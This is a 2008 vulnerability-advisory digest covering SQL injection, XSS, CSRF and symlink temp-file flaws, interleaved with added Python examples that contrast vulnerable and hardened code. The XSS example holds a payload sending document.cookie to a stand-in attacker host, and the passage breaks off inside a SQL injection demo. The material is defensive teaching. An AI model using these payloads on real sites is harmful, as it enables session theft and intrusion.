
VULNERABILITIES \ FIXES - November 7, 2008

Nov 6, 2008 11:59PM PST

CDRW-Taper "amlabel-cdrw" Insecure Temporary Files

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched

Software: CDRW-Taper 0.x

Description:
A security issue has been reported in CDRW-Taper, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issue is caused due to the "amlabel-cdrw" script using temporary files in an insecure manner. This can be exploited to e.g. overwrite or delete arbitrary files via symlink attacks.

The security issue is reported in version 0.4. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov in a Debian bug report.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496380


VMware ESX / ESXi Privilege Escalation and Directory Travers
Nov 7, 2008 12:00AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch

OS: VMware ESX Server 2.x
VMware ESX Server 3.x
VMware ESXi 3.x

Description:
Some vulnerabilities have been reported in VMware ESX and ESXi, which can be exploited by malicious, local users to gain escalated privileges.

Solution:
Update to the latest version or apply patches.

Provided and/or discovered by:
The vendor credits:
1) Derek Soeder
2) Michel Toussaint

Original Advisory:
VMSA-2008-0018:
http://lists.vmware.com/pipermail/security-announce/2008/000042.html

Other References:
SA32612:
http://secunia.com/advisories/32612/

Flaw in VMware's CPU emulation allows privilege elevation
Nov 7, 2008 1:15AM PST
HP Tru64 UNIX AdvFS "showfile" Privilege Escalation Vulnerab
Nov 7, 2008 12:02AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch

OS: HP Tru64 UNIX 5.x

Description:
A vulnerability has been reported in HP Tru64 UNIX, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to an unspecified error within the AdvFS "showfile" command, which can be exploited to gain escalated privileges.

The vulnerability is reported in HP Tru64 UNIX version 5.1B-4 and 5.1B-3.

Solution:
Apply ERP kits.

HP Tru64 UNIX v 5.1B-4:
http://www.itrc.hp.com/service/patch/...hid=T64KIT1001551-V51BB27-ES-20081015

HP Tru64 UNIX v 5.1B-3:
http://www.itrc.hp.com/service/patch/...hid=T64KIT1001540-V51BB26-ES-20080916

Provided and/or discovered by:
The vendor credits Ilja van Sprundel.

Original Advisory:
HPSBTU02383 SSRT080098:
http://itrc.hp.com/service/cki/docDisplay.do?docId=c01599842

Fedora update for php-Smarty
Nov 7, 2008 12:03AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Security Bypass

Where: From remote
Solution Status: Vendor Patch

OS: Fedora 8
Fedora 9

Description:
Fedora has issued an update for php-Smarty. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions.

Solution:
Apply updated packages via the yum utility ("yum update php-Smarty").

Original Advisory:
FEDORA-2008-9401:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00093.html

FEDORA-2008-9420:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00117.html

Other References:
SA32329:
http://secunia.com/advisories/32329/

Fedora update for cman, gfs2-utils, and rgmanager
Nov 7, 2008 12:04AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch

OS: Fedora 9

Description:
Fedora has issued an update for cman, gfs2-utils, and rgmanager. This fixes some security issues, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

Solution:
Apply updated packages via the yum utility ("yum update cman gfs2-utils rgmanager").

Original Advisory:
FEDORA-2008-9458:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00163.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00164.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00165.html

Other References:
SA32602:
http://secunia.com/advisories/32602/

Fedora update for drupal-cck
Nov 7, 2008 12:05AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch

OS: Fedora 9

Description:
Fedora has issued an update for drupal-cck. This fixes some vulnerabilities, which can be exploited by malicious users to conduct script insertion attacks.

Solution:
Apply updated packages via the yum utility ("yum update drupal-cck").

Original Advisory:
FEDORA-2008-9479:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00178.html

Other References:
SA32572:
http://secunia.com/advisories/32572/

Fedora update for ipsec-tools
Nov 7, 2008 12:06AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch

OS: Fedora 8
Fedora 9

Description:
Fedora has issued an update for ipsec-tools. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Apply updated packages via the yum utility ("yum update ipsec-tools").

Original Advisory:
FEDORA-2008-9007:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00129.html

FEDORA-2008-9016:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00190.html

Other References:
SA31450:
http://secunia.com/advisories/31450/

SA31478:
http://secunia.com/advisories/31478/

Mole Group Pizza Online Ordering Script "manufacturers_id" S
Nov 7, 2008 12:07AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data

Where: From remote
Solution Status: Unpatched

Software: Mole Group Pizza Online Ordering Script

Description:
Cyb3r-1sT has reported a vulnerability in Mole Group Pizza Online Ordering Script, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "manufacturers_id" parameter in index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Filter malicious characters or character sequences using a proxy.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7030

VMware Products Privilege Escalation Vulnerability
Nov 7, 2008 12:09AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch

Software: VMware ACE 1.x
VMware ACE 2.x
VMware Player 1.x
VMware Player 2.x
VMware Server 1.x
VMware Workstation 5.x
VMware Workstation 6.x

Description:
A vulnerability has been reported in various VMware products, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to an error in the CPU hardware emulation when handling the Trap flag, which can be exploited by a local user on a guest operating system to gain escalated privileges.

Please see vendor's advisory for a list of affected products and versions.

Provided and/or discovered by:
The vendor credits Derek Soeder.

Original Advisory:
VMSA-2008-0018:
http://lists.vmware.com/pipermail/security-announce/2008/000042.html

Nagios "cmd.cgi" Cross-Site Request Forgery
Nov 7, 2008 12:09AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched

Software: Nagios 3.x

Description:
Andreas Ericsson has discovered a vulnerability in Nagios, which can be exploited by malicious people to conduct cross-site request forgery attacks.

The application allows users to perform certain actions via HTTP requests to "cmd.cgi" without performing any validity checks to verify the request. This can be exploited to execute certain Nagios commands (e.g. to disable notifications) when a logged-in administrator visits a malicious web site.

The vulnerability is confirmed in version 3.0.5. Other versions may also be affected.

Solution:
Do not browse untrusted sites or follow untrusted links while being logged in to the application.

Provided and/or discovered by:
Andreas Ericsson

Original Advisory:
http://www.openwall.com/lists/oss-security/2008/11/06/2
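The weakness described in the Nagios post is that a request carrying the administrator's session cookie is taken as proof that the administrator meant to send it. The following is an added example, not Nagios code and not part of the advisory: a Python stand-in for a cmd.cgi-style endpoint, first as reported (any authenticated request is executed), then with the usual fix of requiring a POST carrying a per-session token that a cross-origin page cannot read. The session dictionary layout, the `MonitorState` class and the command name `disable_notifications` are assumptions made for the illustration, not real Nagios `cmd_typ` values.

```python
import hmac
import secrets

# Constructed stand-in for a cmd.cgi-style command endpoint. Neither the
# session layout nor the command name is Nagios code; "disable_notifications"
# is an illustrative value, not a real cmd_typ number.


class MonitorState:
    """Server-side state the command changes."""

    def __init__(self) -> None:
        self.notifications_enabled = True


def vulnerable_cmd_cgi(state, session, params, method="GET"):
    """Behaviour as reported: any request that arrives with the admin's
    session cookie is acted on. An attacker page can trigger it with
    <img src="http://nagios.example/cgi-bin/cmd.cgi?cmd=disable_notifications">
    because the browser attaches the cookie on its own."""
    if not session.get("authenticated"):
        return "login required"
    if params.get("cmd") == "disable_notifications":
        state.notifications_enabled = False
        return "notifications disabled"
    return "unknown command"


def issue_csrf_token(session):
    """Called when the command form is rendered: a random per-session token
    is stored server-side and echoed into a hidden form field. A page on
    another origin cannot read the form, so it cannot copy the token into
    a forged request."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def hardened_cmd_cgi(state, session, params, method="POST"):
    """Same command, but the request must be a POST and must carry the
    token that was issued to this session."""
    if not session.get("authenticated"):
        return "login required"
    if method != "POST":
        return "rejected: state-changing command must be POSTed"
    expected = session.get("csrf_token", "")
    supplied = params.get("csrf_token", "")
    # Constant-time comparison; the "not expected" guard matters because
    # compare_digest("", "") is True.
    if not expected or not hmac.compare_digest(expected, supplied):
        return "rejected: missing or invalid CSRF token"
    if params.get("cmd") == "disable_notifications":
        state.notifications_enabled = False
        return "notifications disabled"
    return "unknown command"


if __name__ == "__main__":
    state, session = MonitorState(), {"authenticated": True}
    print(vulnerable_cmd_cgi(state, session, {"cmd": "disable_notifications"}))
    state, session = MonitorState(), {"authenticated": True}
    print(hardened_cmd_cgi(state, session, {"cmd": "disable_notifications"}))
    token = issue_csrf_token(session)
    print(hardened_cmd_cgi(state, session,
                           {"cmd": "disable_notifications", "csrf_token": token}))
```

The token check is what actually closes the hole; the POST-only rule on its own does not, since a hidden auto-submitting form on the attacker's page can POST just as easily as an `<img>` can GET. Checking the `Origin` or `Referer` header is a useful second layer but not a replacement, because some clients strip those headers.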

Ubuntu update for tk
Nov 7, 2008 12:11AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: DoS, System access

Where: From remote
Solution Status: Vendor Patch

OS: Ubuntu Linux 6.06
Ubuntu Linux 7.10
Ubuntu Linux 8.04

Description:
Ubuntu has issued an update for tk. This fixes a vulnerability, which can be exploited by malicious people to compromise an application using the library.

Solution:
Apply updated packages.

Original Advisory:
USN-664-1:
https://lists.ubuntu.com/archives/ubu...ty-announce/2008-November/000772.html

Other References:
SA28784:
http://secunia.com/advisories/28784/

Ubuntu update for netpbm
Nov 7, 2008 12:12AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: DoS, System access

Where: From remote
Solution Status: Vendor Patch

OS: Ubuntu Linux 6.06
Ubuntu Linux 7.10

Description:
Ubuntu has issued an update for netpbm. This fixes a vulnerability, which can be exploited by malicious people to potentially compromise a vulnerable system.

Solution:
Apply updated packages.

Original Advisory:
USN-665-1:
https://lists.ubuntu.com/archives/ubu...ty-announce/2008-November/000773.html

Other References:
SA20729:
http://secunia.com/advisories/20729/

Cluster Project Unspecified Insecure Temporary Files
Nov 7, 2008 12:13AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Vendor Patch

Software: Cluster Project 2.x

Description:
Some security issues have been reported in Cluster Project, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issues are caused due to unspecified scripts provided by the CMAN, rgmanager, and gfs2 components using temporary files in an insecure manner. This can be exploited to perform unspecified actions with escalated privileges.

The security issues are reported in versions prior to 2.03.09.

Solution:
Update to version 2.03.09.

Provided and/or discovered by:
Reported via Fedora update advisories.

Changelog:
2008-11-07: Updated "Description" section with information about additionally affected components. Added links to the "Original Advisory" section.

Original Advisory:
FEDORA-2008-9458:
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00163.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00164.html
https://www.redhat.com/archives/fedor...-announce/2008-November/msg00165.html

http://secunia.com/advisories/32602/

TestLink Multiple Script Insertion Vulnerabilities
Nov 7, 2008 12:14AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Workaround

Software: TestLink 1.x

Description:
Some vulnerabilities have been reported in TestLink, which can be exploited by malicious users to conduct script insertion attacks.

Input passed via e.g. test project and test plan names is not properly sanitised before being stored. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in context of an affected site when the malicious data is viewed.

The vulnerabilities are reported in versions prior to 1.8 RC1.

Solution:
Fixed in unstable version 1.8 RC1.

Filter malicious characters and character sequences in a web proxy.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sourceforge.net/project/shownotes.php?release_id=638751

DevelopItEasy Events Calendar Multiple SQL Injection Vulnera
Nov 7, 2008 12:15AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: DevelopItEasy Events Calendar 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Events Calendar, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in calendar_details.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7013

DevelopItEasy News And Article System Multiple SQL Injection
Nov 7, 2008 12:16AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: DevelopItEasy News And Article System 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy News And Article System, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "aid" parameter in article_details.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.4. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7014

DevelopItEasy Membership System Multiple SQL Injection Vulne
Nov 7, 2008 12:17AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: DevelopItEasy Membership System 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Membership System, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "email" and "password" parameters in customer_login.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.3. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7015

DevelopItEasy Photo Gallery Multiple SQL Injection Vulnerabi
Nov 7, 2008 12:18AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: DevelopItEasy Photo Gallery 1.x

Description:
Cyb3r-1sT has reported some vulnerabilities in DevelopItEasy Photo Gallery, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "cat_id" parameter in gallery_category.php, to the "photo_id" parameter in gallery_photo.php and to the "user_name" and "user_pass" parameters in admin/index.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

These vulnerabilities are reported in version 1.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Cyb3r-1sT

Original Advisory:
http://milw0rm.com/exploits/7016

TurnkeyForms Local Classifieds "r" SQL Injection Vulnerabili
Nov 7, 2008 12:19AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: TurnkeyForms Local Classifieds

Description:
TR-ShaRk has reported a vulnerability in TurnkeyForms Local Classifieds, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "r" parameter in listtest.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Note: This can also be exploited to conduct cross-site scripting attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
TR-ShaRk

Original Advisory:
http://milw0rm.com/exploits/7035

DigitalDJ fest.pl Insecure Temporary Files
Nov 7, 2008 12:20AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched

Software: DigitalDJ 0.x

Description:
A security issue has been reported in DigitalDJ, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issue is caused due to the fest.pl script using temporary files in an insecure manner. This can be exploited to e.g. overwrite arbitrary files via symlink attacks.

The security issue is reported in version 0.7.5. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov in a Debian bug report.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496399

lmbench Insecure Temporary Files
Nov 7, 2008 12:22AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched

Software: lmbench 2.x

Description:
Some security issues have been reported in lmbench, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issues are caused due to the "scripts/****" and "scripts/rccs" scripts using temporary files in an insecure manner. This can be exploited to overwrite arbitrary files via symlink attacks.

NOTE: Similar security issues in src/rhttp.c, src/lat_fcntl.c, src/lat_fifo.c, src/lat_proc.c, and src/lmhttp.c have also been reported.

The security issues affect version 2.5. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov and Thijs Kinkhorst in a Debian bug report for development version 3.0-a7.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496427

PHP Classifieds "admin_username" SQL Injection Vulnerability
Nov 7, 2008 12:23AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: PHP Classifieds 7.x

Description:
ZoRLu has reported a vulnerability in PHP Classifieds, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "admin_username" parameter in login.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
ZoRLu

Original Advisory:
http://milw0rm.com/exploits/7023

Silva "fulltext" Cross-Site Scripting Vulnerability
Nov 7, 2008 12:24AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch

Software: Silva 1.x
Silva 2.x

Description:
Russ McRee has reported a vulnerability in Silva, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input passed via the "fulltext" parameter to the Silva Find component when performing a search is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerability is reported in Silva Find version 1.1.5 and prior included in Silva prior to 2.1.0.2, 2.0.12.2, and 1.6.3.2.

Solution:
Update to version 2.1.0.2, 2.0.12.2, or 1.6.3.2.

Provided and/or discovered by:
Russ McRee, HolisticInfoSec

Original Advisory:
http://holisticinfosec.org/content/view/91/45/

Sun SPARC System Firmware Unauthorised Data Access
Nov 7, 2008 12:26AM PST

Release Date: 2008-11-07

Critical: Not critical
Impact: Security Bypass

Where: Local system
Solution Status: Vendor Patch

OS: Sun System Firmware 6.6.x
Sun System Firmware 7.1.x

Description:
A vulnerability has been reported in Sun System Firmware, which can be exploited by malicious, local users to bypass certain security restrictions.

The vulnerability is caused due to an unspecified error in the firmware for certain Sun SPARC systems, which can be exploited by privileged users to access memory in another logical domain.

The vulnerability affects systems using the Sun UltraSPARC T1, UltraSPARC T2, and UltraSPARC T2+ processors.

Solution:
Update to fixed versions.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-244826-1

EC-CUBE "image" SQL Injection Vulnerability
Nov 7, 2008 12:28AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Vendor Patch

Software: EC-CUBE 1.x
EC-CUBE 2.x

Description:
A vulnerability has been reported in EC-CUBE, which can be exploited by malicious people to conduct SQL injection attacks.

Solution:
The vendor has released updated versions:
http://www.ec-cube.net/download/index.php

Provided and/or discovered by:
Reported via JPCERT/CC.

Original Advisory:
http://jvn.jp/en/jp/JVN19072922/index.html

SUSE Update for Multiple Packages
Nov 7, 2008 12:29AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Cross Site Scripting, DoS, System access

Where: From remote
Solution Status: Vendor Patch

OS: openSUSE 10.2
openSUSE 10.3
openSUSE 11.0
SUSE Linux Enterprise Server 10
SUSE Linux Enterprise Server 9

Software: Novell Open Enterprise Server 1.x

Description:
SUSE has issued an update for multiple packages. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting and cross-site request forgery attacks, cause a DoS (Denial of Service), and compromise a vulnerable system.

Solution:
Updated packages are available via YaST Online Update or the SUSE FTP server.

Original Advisory:
SUSE-SR:2008:024:
http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00000.html

Other References:
SA28046:
http://secunia.com/advisories/28046/

SA31384:
http://secunia.com/advisories/31384/

SA32137:
http://secunia.com/advisories/32137/

IBM HMC RMC Daemon Denial of Service Vulnerability
Nov 7, 2008 12:30AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: DoS

Where: From local network
Solution Status: Vendor Patch

OS: IBM Hardware Management Console (HMC)

Description:
A vulnerability has been reported in IBM Hardware Management Console (HMC), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error within the Resource Monitoring and Control (RMC) daemon and can be exploited to crash the daemon via a specially crafted packet with an invalid client packet length.

Solution:
Update to version 7 Release 3.3.0 SP2 or Release 3.2.0 SP1.
https://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
IBM (MH01133, MH01134):
http://www14.software.ibm.com/webapp/...criptions/pqvcmjd?mode=18&ID=4441
http://www14.software.ibm.com/webapp/...criptions/pqvcmjd?mode=18&ID=4442

http://secunia.com/advisories/32571/

Firewall Builder "fwb_install" Insecure Temporary Files
Nov 7, 2008 12:31AM PST

Release Date: 2008-11-07

Critical: Less critical
Impact: Privilege escalation

Where: Local system
Solution Status: Unpatched

Software: Firewall Builder 2.x

Description:
A security issue has been reported in Firewall Builder, which can be exploited by malicious, local users to perform certain actions with escalated privileges.

The security issue is caused due to the src/tools/fwb_install script using temporary files in an insecure manner. This can be exploited to e.g. overwrite arbitrary files via symlink attacks.

The security issue is reported in version 2.1.19. Other versions may also be affected.

Solution:
Restrict local access to trusted users only.

Provided and/or discovered by:
Reported by Dmitry E. Oboukhov in a Debian bug report.

Original Advisory:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496406
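Five posts in this thread (CDRW-Taper "amlabel-cdrw", Cluster Project, DigitalDJ fest.pl, lmbench, Firewall Builder "fwb_install") report the same class of bug: a script writes to a temporary file whose name can be predicted, so a local user can pre-create that name as a symlink and have the script overwrite whatever the link points at. The following is an added example, not code from any of those projects or from the Debian reports: a Python reproduction of the attack against a directory created for the purpose, with the vulnerable write beside the hardened one. The file names `victim.conf` and `tool.1234` are constructed stand-ins for a real target file and a `/tmp/name.$$`-style temp name.

```python
import os
import tempfile


def insecure_write(tmp_path: str, data: str) -> None:
    """The pattern behind these advisories: a predictable name such as
    /tmp/tool.$$ opened with plain open(), which follows a symlink sitting
    at that path and truncates whatever the link points at."""
    with open(tmp_path, "w") as f:
        f.write(data)


def safe_write(tmp_path: str, data: str) -> None:
    """Hardened: O_CREAT|O_EXCL fails if the path already exists (a symlink
    counts as existing and is not followed), O_NOFOLLOW refuses to traverse
    one, and the file is created mode 0600 so nobody else can read it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(tmp_path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def simulate_symlink_attack(writer):
    """Plant a symlink at the predictable temp name, then run the writer.
    Returns (victim file contents afterwards, error class name or None).
    Everything happens inside a throwaway directory; nothing outside it
    is touched."""
    with tempfile.TemporaryDirectory() as root:
        victim = os.path.join(root, "victim.conf")   # stands in for a file the attacker cannot write
        with open(victim, "w") as f:
            f.write("original")
        predictable = os.path.join(root, "tool.1234")   # attacker guessed tool.$$
        os.symlink(victim, predictable)
        error = None
        try:
            writer(predictable, "attacker-controlled")
        except OSError as exc:
            error = type(exc).__name__
        with open(victim) as f:
            return f.read(), error


if __name__ == "__main__":
    print("insecure writer:", simulate_symlink_attack(insecure_write))
    print("safe writer:    ", simulate_symlink_attack(safe_write))
```

For a shell script the equivalent fix is `tmp=$(mktemp -t name.XXXXXX) || exit 1` rather than `tmp=/tmp/name.$$`; in Python, `tempfile.mkstemp()` applies the same flags as `safe_write` and also picks an unpredictable name. The advisories' "restrict local access to trusted users" workaround only narrows who can plant the link; it does not remove the race.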

TurnkeyForms Software Directory Multiple Vulnerabilities
Nov 7, 2008 12:32AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Cross Site Scripting, Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: TurnkeyForms Software Directory

Description:
G4N0K has reported some vulnerabilities in TurnkeyForms Software Directory, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

1) Input passed to the "cid" parameter in showcategory.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed to the "msg" parameter in signinform.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session, in the context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
G4N0K

Original Advisory:
http://milw0rm.com/exploits/7027
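The script-insertion and cross-site scripting posts in this thread (TestLink project and plan names, the Silva "fulltext" search parameter, the TurnkeyForms "msg" parameter above) all come down to user input being copied into a page without encoding for the context it lands in. As an added example, not code from any of those applications, the Python below renders a constructed search page three ways: unescaped, with only angle brackets escaped (a common half-fix that still leaves an attribute injectable), and with `html.escape` applied in full. The two payloads and the page layout are constructed for the illustration.

```python
import html

# Constructed payloads standing in for a stored TestLink project name, a
# Silva "fulltext" search string or the TurnkeyForms "msg" parameter.
BODY_PAYLOAD = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_unescaped(value: str) -> str:
    """Echoes the value straight into a text node and an attribute value."""
    return (f"<h1>Results for {value}</h1>\n"
            f'<input name="fulltext" value="{value}">')


def render_brackets_only_escaped(value: str) -> str:
    """Half-fix: < > & escaped, quotes left alone. The text node is now
    safe, but inside value="..." a double quote still ends the attribute."""
    escaped = html.escape(value, quote=False)
    return (f"<h1>Results for {escaped}</h1>\n"
            f'<input name="fulltext" value="{escaped}">')


def render_escaped(value: str) -> str:
    """html.escape() with its default quote=True encodes " and ' as well,
    which is required in attribute context and harmless in text."""
    escaped = html.escape(value)
    return (f"<h1>Results for {escaped}</h1>\n"
            f'<input name="fulltext" value="{escaped}">')


def has_script_tag(page: str) -> bool:
    """Crude check used only for the demonstration."""
    return "<script" in page.lower()


def attribute_broken_out(page: str) -> bool:
    """True if the payload managed to start a new onfocus= attribute inside
    the <input> tag (only the tag is inspected, not the heading text)."""
    input_tag = page.split("<input", 1)[1]
    return ' onfocus="' in input_tag


if __name__ == "__main__":
    print(render_unescaped(BODY_PAYLOAD))
    print(render_brackets_only_escaped(ATTR_PAYLOAD))
    print(render_escaped(ATTR_PAYLOAD))
```

The rule the half-fix violates is that encoding is chosen by output context, not by input: a value that is safe in a text node is not necessarily safe inside a quoted attribute, and neither encoding is adequate inside a `<script>` block or a URL. A template engine that auto-escapes on output is the practical way to get this right across a whole application; the "filter in a web proxy" workaround in the TestLink post only catches patterns the proxy knows about.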

TurnkeyForms Business Survey Pro "id" SQL Injection Vulnerab
Nov 7, 2008 12:33AM PST

Release Date: 2008-11-07

Critical: Moderately critical
Impact: Manipulation of data, Exposure of sensitive information

Where: From remote
Solution Status: Unpatched

Software: TurnkeyForms Business Survey Pro

Description:
G4N0K has reported a vulnerability in TurnkeyForms Business Survey Pro, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "id" parameter in survey_results_text.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
G4N0K

Original Advisory:
http://milw0rm.com/exploits/7029
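The SQL injection posts in this thread (Mole Group, the four DevelopItEasy scripts, PHP Classifieds, the TurnkeyForms scripts, EC-CUBE) share two shapes: a login form whose `user_name`/`user_pass` values are concatenated into the query, and a record lookup whose numeric `id` is concatenated in. The following is an added example, not code from any of those products: a Python/sqlite3 stand-in for both shapes, showing the authentication bypass and the row dump against the string-built queries, and the parameterised versions that refuse them. The table names, the sample rows and the `correct horse` password are constructed for the illustration; a real application would store a password hash, which does not change the injection.

```python
import sqlite3


def sample_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user_name TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'correct horse')")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?)",
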